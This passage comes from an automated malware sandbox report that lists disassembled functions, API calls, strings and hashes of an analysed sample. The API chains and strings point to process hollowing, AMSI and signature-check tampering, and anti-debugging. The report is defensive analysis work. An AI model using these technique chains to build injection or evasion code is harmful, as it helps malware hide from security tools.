                                                                                                                                              • Part of subcall function 027C85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027C8660
                                                                                                                                            • GetThreadContext.KERNEL32(000005DC,02812420,ScanString,028123A4,027CA774,UacInitialize,028123A4,027CA774,ScanBuffer,028123A4,027CA774,ScanBuffer,028123A4,027CA774,UacInitialize,028123A4), ref: 027C943A
                                                                                                                                              • Part of subcall function 027C824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C82BD
                                                                                                                                              • Part of subcall function 027C84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 027C8521
                                                                                                                                              • Part of subcall function 027C79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027C7A1F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                            • API String ID: 2852987580-51457883
                                                                                                                                            • Opcode ID: 7e64018c608a2c33e1916c63985a5e69b07ccbd1f990017677b7f21d04c9b6a1
                                                                                                                                            • Instruction ID: 9d7e922069e15c88bf44efdfa0916754d8a9c234c27ff2cd70843170c576becc
                                                                                                                                            • Opcode Fuzzy Hash: 7e64018c608a2c33e1916c63985a5e69b07ccbd1f990017677b7f21d04c9b6a1
                                                                                                                                            • Instruction Fuzzy Hash: B5E22D75A105299FDB13EB74CCB9BDE73BABF88300F2141BAE005AB255DA309E458F51
                                                                                                                                            Function 027B5A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 8710 27b5a78-27b5ab9 GetModuleFileNameA RegOpenKeyExA 8711 27b5afb-27b5b3e call 27b58b4 RegQueryValueExA 8710->8711 8712 27b5abb-27b5ad7 RegOpenKeyExA 8710->8712 8717 27b5b62-27b5b7c RegCloseKey 8711->8717 8718 27b5b40-27b5b5c RegQueryValueExA 8711->8718 8712->8711 8713 27b5ad9-27b5af5 RegOpenKeyExA 8712->8713 8713->8711 8715 27b5b84-27b5bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8713->8715 8719 27b5bbb-27b5bbf 8715->8719 8720 27b5c9e-27b5ca5 8715->8720 8718->8717 8721 27b5b5e 8718->8721 8723 27b5bcb-27b5be1 lstrlenA 8719->8723 8724 27b5bc1-27b5bc5 8719->8724 8721->8717 8725 27b5be4-27b5be7 8723->8725 8724->8720 8724->8723 8726 27b5be9-27b5bf1 8725->8726 8727 27b5bf3-27b5bfb 8725->8727 8726->8727 8728 27b5be3 8726->8728 8727->8720 8729 27b5c01-27b5c06 8727->8729 8728->8725 8730 27b5c08-27b5c2e lstrcpynA LoadLibraryExA 8729->8730 8731 27b5c30-27b5c32 8729->8731 8730->8731 8731->8720 8732 27b5c34-27b5c38 8731->8732 8732->8720 8733 27b5c3a-27b5c6a lstrcpynA LoadLibraryExA 8732->8733 8733->8720 8734 27b5c6c-27b5c9c lstrcpynA LoadLibraryExA 8733->8734 8734->8720
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,027B0000,027DE790), ref: 027B5A94
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027B0000,027DE790), ref: 027B5AB2
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027B0000,027DE790), ref: 027B5AD0
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027B5AEE
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027B5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027B5B37
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,027B5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027B5B7D,?,80000001), ref: 027B5B55
                                                                                                                                            • RegCloseKey.ADVAPI32(?,027B5B84,00000000,?,?,00000000,027B5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027B5B77
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027B5B94
                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027B5BA1
                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027B5BA7
                                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027B5BD2
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027B5C19
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027B5C29
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027B5C51
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027B5C61
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027B5C87
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 027B5C97
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                            • API String ID: 1759228003-2375825460
                                                                                                                                            • Opcode ID: 81579fc8422512ed0493a974e25dd0c47a41a41ce7d0c9d1aa0b7274270c7e08
                                                                                                                                            • Instruction ID: bcd66b6a5d9681d14a1ba6cc7ac0a7b328d1f5d879edd603a14962e687a015f2
                                                                                                                                            • Opcode Fuzzy Hash: 81579fc8422512ed0493a974e25dd0c47a41a41ce7d0c9d1aa0b7274270c7e08
                                                                                                                                            • Instruction Fuzzy Hash: 2B5185B1E4020D7EFB27D6A4DC4AFEF7BBD9F04744F8001A1A604E6181EB749A448FA4
                                                                                                                                            Function 027C8798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 10677 27c8798-27c87bd LoadLibraryW 10678 27c87bf-27c87d7 GetProcAddress 10677->10678 10679 27c8807-27c880d 10677->10679 10680 27c87fc-27c8802 FreeLibrary 10678->10680 10681 27c87d9-27c87f8 call 27c7cf8 10678->10681 10680->10679 10681->10680 10684 27c87fa 10681->10684 10684->10680
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryW.KERNEL32(bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize,028123A4,027CA774,UacScan), ref: 027C87AC
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027C87C6
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize), ref: 027C8802
                                                                                                                                              • Part of subcall function 027C7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C7D6C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                            • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                            • API String ID: 1002360270-4067648912
                                                                                                                                            • Opcode ID: 6eaf25be5fc9e4e68641c5081ce4a8ea637ff8ceec314fba3947fd149347ab0d
                                                                                                                                            • Instruction ID: f62c199a2aae958e3d821f0dbe484a05c2aa7afdc9afbacdd2087b425ad6059a
                                                                                                                                            • Opcode Fuzzy Hash: 6eaf25be5fc9e4e68641c5081ce4a8ea637ff8ceec314fba3947fd149347ab0d
                                                                                                                                            • Instruction Fuzzy Hash: 00F0C8B9E813349EEB15AA79A849F5677DCF786314F08093DBA18871E4D77444108B50
                                                                                                                                            Function 027CF024 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 10694 27cf024-27cf03e GetModuleHandleW 10695 27cf06a-27cf072 10694->10695 10696 27cf040-27cf052 GetProcAddress 10694->10696 10696->10695 10697 27cf054-27cf064 CheckRemoteDebuggerPresent 10696->10697 10697->10695 10698 27cf066 10697->10698 10698->10695
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(KernelBase), ref: 027CF034
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 027CF046
                                                                                                                                            • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 027CF05D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                            • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                            • API String ID: 35162468-539270669
                                                                                                                                            • Opcode ID: 3c9b50cb78c9717415c62e6460927a5b43dccb0fe132cfa9db8d84303bc48c7a
                                                                                                                                            • Instruction ID: 92ac247b1c4f444597808639bfbb9dfa90e02f5a11dfcabbae4f9fe4651e67e0
                                                                                                                                            • Opcode Fuzzy Hash: 3c9b50cb78c9717415c62e6460927a5b43dccb0fe132cfa9db8d84303bc48c7a
                                                                                                                                            • Instruction Fuzzy Hash: 45F0A770A44248AAD711B6B888897DDFBBA9B15738F7443DEE825625C1E77106C0C652
                                                                                                                                            Function 027CDFE4 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027B4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 027B4EDA
                                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CE0B4), ref: 027CE01F
                                                                                                                                            • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,027CE0B4), ref: 027CE04F
                                                                                                                                            • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 027CE064
                                                                                                                                            • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 027CE090
                                                                                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 027CE099
                                                                                                                                              • Part of subcall function 027B4C0C: SysFreeString.OLEAUT32(027CED84), ref: 027B4C1A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1897104825-0
                                                                                                                                            • Opcode ID: 627111ee9a31dd7e4ff2198a41a3451a1f9e1606efabb223dccf9abfac2386cd
                                                                                                                                            • Instruction ID: b2c4220db80f7f3d5581f58fbe603b65fe9ea0e9078a2b6705cc4e11aacde455
                                                                                                                                            • Opcode Fuzzy Hash: 627111ee9a31dd7e4ff2198a41a3451a1f9e1606efabb223dccf9abfac2386cd
                                                                                                                                            • Instruction Fuzzy Hash: BB21C171A40308BAEB12EAE4CC5AFDFB7BDAF08B00F510465B700F71C1D674AA458B55
                                                                                                                                            Function 027CE72C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 027CE86A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CheckConnectionInternet
                                                                                                                                            • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                            • API String ID: 3847983778-3852638603
                                                                                                                                            • Opcode ID: dbe09ed7f8345b383a09f08ee6e2c25d0ffbdcd20178edabcbef31baeffbc582
                                                                                                                                            • Instruction ID: 1a09b16c5eaf8549e5ed26ac3c92c9207fbfa9f4d3dc133b4e3205b806184558
                                                                                                                                            • Opcode Fuzzy Hash: dbe09ed7f8345b383a09f08ee6e2c25d0ffbdcd20178edabcbef31baeffbc582
                                                                                                                                            • Instruction Fuzzy Hash: E341FC75A141099FEB13EBB4D8A6BDEB7FAEF48710F214439E041A7646DA74AD018F10
                                                                                                                                            Function 027CDF00 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027B4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 027B4EDA
                                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CDFD2), ref: 027CDF3F
                                                                                                                                            • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027CDF79
                                                                                                                                            • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027CDFA6
                                                                                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027CDFAF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3764614163-0
                                                                                                                                            • Opcode ID: 1747cd7bb144f78b8aeb7f2a9e500b6c9b0e40afc1475e26138f67484bc23b4d
                                                                                                                                            • Instruction ID: 9dfa117de2e8d98ad27b0fd3d0471556c937f664a69398b77a2b35220230af28
                                                                                                                                            • Opcode Fuzzy Hash: 1747cd7bb144f78b8aeb7f2a9e500b6c9b0e40afc1475e26138f67484bc23b4d
                                                                                                                                            • Instruction Fuzzy Hash: 8321EE71A40308BAEB22EAE0CC56FDEB7BDAF05B00F604065B600F71C1D7B06A048B55
                                                                                                                                            Function 027C79AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027C7A1F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                            • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                            • API String ID: 4072585319-445027087
                                                                                                                                            • Opcode ID: 46e1b60403e2b83acec05c6693fab6a9e40b5b1b5cfbc2a76c68b9cb1dfd6e75
                                                                                                                                            • Instruction ID: ed87d860757057b5d815bde0bf2704a1dda0b06b8debcb862a02356f2b10c319
                                                                                                                                            • Opcode Fuzzy Hash: 46e1b60403e2b83acec05c6693fab6a9e40b5b1b5cfbc2a76c68b9cb1dfd6e75
                                                                                                                                            • Instruction Fuzzy Hash: DC111E75640208BFEB06DFA4DC55F9EB7EDEF48710F514869B900D7650DA30AA108F65
                                                                                                                                            Function 027C79AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027C7A1F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                            • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                            • API String ID: 4072585319-445027087
                                                                                                                                            • Opcode ID: d277aafe06ce33d70e76b2ac80633c5be9b9d4b845067e294ca4656ecbfcfa0c
                                                                                                                                            • Instruction ID: 406f7b3a24f6a4ff6c835a1f1c523e0c72518abd66f0cd50b7819b8c362513c0
                                                                                                                                            • Opcode Fuzzy Hash: d277aafe06ce33d70e76b2ac80633c5be9b9d4b845067e294ca4656ecbfcfa0c
                                                                                                                                            • Instruction Fuzzy Hash: F2111E75640208AFEB06DFA4DC55F9EB7ADEF48710F514869B900D7650DA30AA108F65
                                                                                                                                            Function 027C824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C82BD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
